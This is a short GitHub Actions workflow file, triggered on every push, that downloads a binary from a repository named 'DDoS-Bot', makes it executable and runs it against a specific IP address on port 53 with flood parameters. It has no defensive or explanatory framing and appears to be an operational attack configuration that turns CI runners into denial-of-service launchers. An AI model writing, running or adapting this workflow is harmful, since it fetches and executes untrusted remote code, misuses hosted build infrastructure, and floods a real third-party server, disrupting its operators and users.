name: soul fucker
on: [push]
jobs:
  stage-0:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Get Linux Binary and Run
        run: |
          # Sahi Linux x86_64 binary download karna
          wget -q https://github.com/Mustafa-Soul/DDoS-Bot/raw/main/soul -O soul
          chmod 777 soul
          ./soul 147.75.202.61 53 10 100
